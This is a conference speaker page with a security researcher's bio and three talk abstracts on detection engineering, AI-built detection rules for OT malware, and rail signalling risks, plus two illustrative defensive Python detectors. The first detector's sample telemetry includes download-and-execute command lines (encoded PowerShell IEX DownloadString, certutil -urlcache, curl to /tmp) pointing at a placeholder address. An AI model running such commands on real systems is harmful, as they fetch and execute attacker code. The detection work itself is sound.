Mars Cheng

TXOne Networks Inc. / Senior Threat Research Manager, PSIRT and Threat Research

Association of Hackers in Taiwan / Executive Director

Mars Cheng (@marscheng_) is the Senior Threat Research Manager at TXOne Networks, where he leads the PSIRT and Threat Research Team, overseeing product security and threat research initiatives. As the Executive Director of the Association of Hackers in Taiwan (HIT/HITCON) and General Coordinator of HITCON CISO Summit 2025, he plays a pivotal role in fostering collaboration between enterprises and government entities to strengthen cybersecurity. His expertise encompasses ICS/SCADA systems, malware analysis, threat intelligence and hunting, blue team, and enterprise security. A seasoned speaker, Mars has delivered over 60 presentations at international cybersecurity conferences, including Black Hat USA, Europe, and MEA, RSA Conference, DEF CON, CODE BLUE, FIRST, HITB, HITCON, Troopers, NOHAT, SecTor, S4, SINCON, ROOTCON, among others. He has successfully organized several notable HITCON events, such as the HITCON CISO Summit in 2024 and 2023, HITCON PEACE 2022, and HITCON 2021 and 2020.

SPEECH
4/16 (Wed.) 14:00 - 14:30 4F 4C SecOps Forum Live Translation Session
The Last Mile of Blue Team Detection: Integrating Detection Engineering for Threat Detection

In response to the increasingly complex and changing network threats, enterprise networks often exhibit high heterogeneity with diverse architectures, operating systems, and applications. This diversity challenges the application of a single detection logic. Detection Engineering has emerged as a crucial theme, enabling the design of flexible detection rules tailored to specific environments through systematic methods. By abstracting attack behaviors into characteristic patterns, this approach remains adaptable to rapid changes. This presentation explores the core concepts and practices of Detection Engineering, demonstrated with real-world cases. We'll also discuss using frameworks like MITRE ATT&CK to deconstruct and locate potential detection points in attack behaviors.
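As an added illustration of the point above (this is example code written for this page, not the speaker's or TXOne's code, and its rules and ATT&CK mappings are assumptions chosen for the example), the sketch below normalizes two different telemetry sources, a Windows 4688 process-creation event rendered as JSON and a simplified Linux exec log line, into one schema, then runs a small set of behavioural rules, each tagged with the ATT&CK technique it gives visibility into, over constructed sample events. The same "native downloader fetches a URL" pattern fires on certutil on Windows and on curl on Linux, which is the kind of environment-independent abstraction the abstract describes.

```python
import base64
import json
import re
from dataclasses import dataclass
from typing import Callable, Iterable

# Common schema every source is normalized into before any rule runs.
@dataclass(frozen=True)
class Event:
    host: str
    parent: str    # parent image basename, lower-cased
    image: str     # image basename, lower-cased
    cmdline: str

def _basename(path: str) -> str:
    return re.split(r"[\\/]", path)[-1].lower()

def normalize_windows_4688(raw: str) -> Event:
    """Windows Security 4688 process creation rendered as JSON (constructed field subset)."""
    d = json.loads(raw)
    return Event(d["Computer"], _basename(d["ParentProcessName"]),
                 _basename(d["NewProcessName"]), d["CommandLine"])

def normalize_linux_exec(raw: str) -> Event:
    """Constructed key="value" exec log from a Linux sensor (simplified, not auditd syntax)."""
    d = dict(re.findall(r'(\w+)="([^"]*)"', raw))
    return Event(d["host"], _basename(d["pexe"]), _basename(d["exe"]), d["cmd"])

def decoded_powershell(cmdline: str) -> str:
    """Return the UTF-16LE payload behind -EncodedCommand / -enc / -e, or '' if none."""
    m = re.search(r"-(?:encodedcommand|enc|e)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="ignore")
    except ValueError:
        return ""

@dataclass(frozen=True)
class Rule:
    technique: str          # ATT&CK technique ID the rule gives visibility into
    name: str
    match: Callable[[Event], bool]

URL = re.compile(r"https?://", re.I)
DOWNLOADERS = {"certutil.exe": r"-urlcache", "curl": r"(?:^|\s)-o\s", "wget": r"(?:^|\s)-O\s",
               "powershell.exe": r"downloadstring|downloadfile|invoke-webrequest|\biwr\b"}
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

def effective_cmdline(ev: Event) -> str:
    # Rules look at the visible command line plus any decoded PowerShell payload.
    return ev.cmdline + " " + decoded_powershell(ev.cmdline)

RULES = [
    Rule("T1105", "ingress tool transfer via a native downloader",
         lambda ev: ev.image in DOWNLOADERS
                    and re.search(DOWNLOADERS[ev.image], effective_cmdline(ev), re.I) is not None
                    and URL.search(effective_cmdline(ev)) is not None),
    Rule("T1059.001", "encoded PowerShell fetching or evaluating remote content",
         lambda ev: ev.image == "powershell.exe"
                    and re.search(r"\biex\b|invoke-expression|https?://",
                                  decoded_powershell(ev.cmdline), re.I) is not None),
    Rule("T1204.002", "Office application spawning a scripting host",
         lambda ev: ev.parent in OFFICE and ev.image in SHELLS),
]

def detect(events: Iterable[Event], rules=RULES) -> list[tuple[str, str, str]]:
    """Return (host, image, technique) for every rule that fires on each event."""
    return [(ev.host, ev.image, r.technique) for ev in events for r in rules if r.match(ev)]

# Constructed sample telemetry (hosts, paths and the 198.51.100.7 documentation address are invented).
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
ENC = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_WINDOWS = [
    json.dumps({"Computer": "HMI-01", "ParentProcessName": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
                "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "CommandLine": f"powershell.exe -nop -w hidden -enc {ENC}"}),
    json.dumps({"Computer": "ENG-WS-02", "ParentProcessName": r"C:\Windows\explorer.exe",
                "NewProcessName": r"C:\Windows\System32\certutil.exe",
                "CommandLine": r"certutil.exe -urlcache -split -f http://198.51.100.7/x.exe C:\Users\Public\x.exe"}),
    json.dumps({"Computer": "ENG-WS-02", "ParentProcessName": r"C:\Windows\explorer.exe",
                "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "CommandLine": "powershell.exe Get-Service"}),
]
SAMPLE_LINUX = [
    'host="scada-gw" pexe="/bin/bash" exe="/usr/bin/curl" cmd="curl -o /tmp/.x http://198.51.100.7/x"',
    'host="scada-gw" pexe="/bin/bash" exe="/bin/ls" cmd="ls -la /opt/plc"',
]

def run_samples() -> list[tuple[str, str, str]]:
    events = [normalize_windows_4688(r) for r in SAMPLE_WINDOWS] + \
             [normalize_linux_exec(r) for r in SAMPLE_LINUX]
    return detect(events)

if __name__ == "__main__":
    for host, image, technique in run_samples():
        print(f"{host:10} {image:16} {technique}")
```

Each rule encodes a behaviour rather than an indicator, so the same rule set covers heterogeneous hosts once their events are normalized; the technique tag on each rule is what lets a team map its coverage back onto an ATT&CK matrix and see where detection points are still missing.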

4/17 (Thu.) 14:45 - 15:15 4F 4A Security Strategy & Case Study
Let AI Auto-Generate Neural-ASR Rules for OT-specific Attacks via NLP Approach

Ambitious threat actors targeting the OT/ICS field plan their operations with great intensity to make their intrusions succeed. By abusing multiple misconfigurations and the benign, OT-specific nature of the infrastructure to evade several layers of protection, they can stealthily take control of a factory's essential assets, moving from the IT domain into the OT domain. For example, according to Mandiant's report, the Russian hacker group Sandworm abused OT-level LotL (living-off-the-land) techniques to disrupt power in Ukraine. The key to their success is the abuse of OT-specific protocols, techniques and LOLBins that modern AV/EDR products find difficult to classify as malicious.

In this research, instead of detecting what is MALICIOUS, we propose a novel multimodal AI detection approach, Suspicious2Vec, which achieves contextual comprehension of process integrity and of the suspicious behaviors that occur within benign OT/ICS operation. We apply the AI model to large-scale, real-world factories to build a baseline of universal OT-specific operations, encoded as numerical vectors, and successfully filter in-the-wild anonymous abuse out of that baseline and classify it as malicious.

From July 2023 to July 2024, our experiment ran for a full year and received 2,000,000 records that 562+ human-written expert rules had flagged as unique suspicious techniques. We use the AI model to project those suspicious actions into numerical vectors with well-known word-embedding methods, and we also model all the suspicious behaviors of OT and IT malware families from VirusTotal to generate a set of malware templates that serve as neural ASR (Attack Surface Reduction) rules for detection. This approach successfully captured 12+ OT malware variants among 52,438 factory program files.
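The abstract describes three steps: a benign baseline built from what expert rules flag in normal factory operation, per-family malware templates built from labelled samples, and comparison of unknown programs against both in vector space. The Python below is an added illustration of that pipeline written for this page; it is not the Suspicious2Vec implementation, and it substitutes a TF-IDF-weighted bag of ATT&CK technique IDs for the word-embedding step the research uses. All technique sequences, family names and "unknown" programs are constructed for the example.

```python
import math
from collections import Counter

# Constructed sequences of ATT&CK technique IDs that expert rules flagged per
# program; invented for this illustration, not data from the research.
BENIGN_BASELINE = [
    ["T1569.002", "T1021.002"],            # service execution + admin share from an engineering host
    ["T1021.002", "T1570"],                # tool transfer between PLC programming hosts
    ["T1569.002"],
    ["T1021.002", "T1569.002"],
]
MALWARE_FAMILIES = {
    "wiper-like": [
        ["T1486", "T1070.004", "T1489"],
        ["T1489", "T1486", "T1070.004", "T1529"],
    ],
    "ot-lotl": [
        ["T1021.002", "T1569.002", "T0855", "T1070.004"],   # T0855: ICS Unauthorized Command Message
        ["T1569.002", "T0855", "T1489"],
    ],
}

def idf_table(docs):
    """Smoothed inverse document frequency: rare techniques weigh more than routine ones."""
    n = len(docs)
    df = Counter(t for d in docs for t in set(d))
    return {t: math.log((1 + n) / (1 + c)) + 1.0 for t, c in df.items()}

def vectorize(doc, idf):
    """L2-normalised TF-IDF vector over technique IDs; unseen techniques carry no weight."""
    tf = Counter(t for t in doc if t in idf)
    v = {t: c * idf[t] for t, c in tf.items()}
    norm = math.sqrt(sum(x * x for x in v.values())) or 1.0
    return {t: x / norm for t, x in v.items()}

def cosine(a, b):
    return sum(x * b.get(t, 0.0) for t, x in a.items())

def template(docs, idf):
    """A family template is the normalised centroid of its members' vectors."""
    acc = Counter()
    for d in docs:
        acc.update(vectorize(d, idf))
    norm = math.sqrt(sum(x * x for x in acc.values())) or 1.0
    return {t: x / norm for t, x in acc.items()}

def build_templates(baseline, families):
    all_docs = baseline + [d for docs in families.values() for d in docs]
    idf = idf_table(all_docs)
    templates = {"benign": template(baseline, idf)}
    templates.update({name: template(docs, idf) for name, docs in families.items()})
    return idf, templates

def classify(doc, idf, templates, margin=0.15):
    """Return the best-matching malware family, or None when the program does not sit
    closer to any malware template than to the benign baseline by at least `margin`."""
    v = vectorize(doc, idf)
    scores = {name: cosine(v, tpl) for name, tpl in templates.items()}
    benign = scores.pop("benign")
    name, best = max(scores.items(), key=lambda kv: kv[1])
    return name if best - benign >= margin else None

IDF, TEMPLATES = build_templates(BENIGN_BASELINE, MALWARE_FAMILIES)

UNKNOWN_PROGRAMS = {                        # constructed unlabelled programs "seen in the wild"
    "prog_a": ["T1569.002", "T0855", "T1070.004", "T1489"],
    "prog_b": ["T1021.002", "T1569.002"],
    "prog_c": ["T1486", "T1489", "T1070.004", "T1529"],
}

def run_samples():
    return {name: classify(seq, IDF, TEMPLATES) for name, seq in UNKNOWN_PROGRAMS.items()}

if __name__ == "__main__":
    for name, verdict in run_samples().items():
        print(name, verdict or "benign baseline")
```

The benign template is what keeps routine OT behaviour (service execution, admin-share tool pushes) from being flagged even though the same techniques appear inside the malware templates: prog_b shares two techniques with the ot-lotl family yet stays closer to the baseline, while prog_a, which adds an unauthorized ICS command message and file deletion, crosses the margin.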

4/17 (Thu.) 16:15 - 16:45 7F 701H Cyber-Physical System Security Forum
Never Derail: Safeguarding Rail Systems in Critical Infrastructure

"Attacks on rail systems have increased by 220%." Last August, a retired official from the U.S. National Security Agency (NSA) pointed out that threats to railways have become the spark that ignites warfare in regional conflicts. In recent years, incidents such as train hijackings, railway paralysis, and the cutting off of supply lines have emerged as new national security concerns worldwide. In response, the U.S. National Institute of Standards and Technology (NIST) and the Transportation Security Administration (TSA) jointly issued more stringent rail safety standards in October 2022 to counter these threats and protect critical transportation systems like subways, railways, and train networks.

However, because railway and train control systems were developed early, many insecure train signaling systems have been widely adopted around the world and have become the mainstream choice for both public transportation and freight operations.

To fully explore the scope of these threats, this session will consolidate and review the six major systems used in global railways and public transportation (e.g., CBTC, ATP, ATC, and PZB) and examine their underlying track signaling control systems. We will begin with research on ATS (Automatic Train Stop) presented at CODE BLUE 2024, a classic system that has been extensively deployed in Japan and Europe. Its signaling design is intended to stop a train automatically in an emergency, without requiring human intervention. However, once attackers gain a sufficient understanding of the mechanism, they can exploit it to control train operations; even the modern ATC (Automatic Train Control) systems used on North American railways carry similar risks.

The session will cover topics including braking devices, automated signal-based braking, and the communication design and security risks of HOTT (Head of Train Telemetry) and EOTT (End of Train Telemetry), along with real-world signal replay attacks. It will conclude with recommendations for preventive measures, aimed at guiding the future development and planning of rail cybersecurity systems to safeguard critical rail infrastructure.